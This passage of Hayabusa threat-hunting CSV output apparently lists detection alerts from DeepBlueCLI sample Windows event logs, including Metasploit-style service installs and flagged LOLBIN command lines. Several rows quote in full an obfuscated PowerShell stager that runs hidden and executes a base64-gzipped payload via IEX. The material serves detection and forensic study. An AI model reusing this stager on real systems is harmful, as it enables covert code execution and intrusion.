0x1d069",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:10:06.597 
+09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,info,,New Service Installed,Name: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service 
Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,info,,New Service Installed,Name: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,info,,New Service Installed,Name: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:16:40.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xad4 | User: IEUser | LID: 0x1ceaf",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,info,,New Service Installed,Name: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe | Account: LocalSystem | Start Type: demand 
start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,info,,New Service Installed,Name: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNr
ctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x12c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x460 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x94c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 06:05:56.876 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 06:06:09.220 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 06:06:09.236 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xff8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 07:54:48.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc0c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 07:54:49.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 07:54:49.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 07:55:08.329 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0xb0c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x85c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcf4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:07:47.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
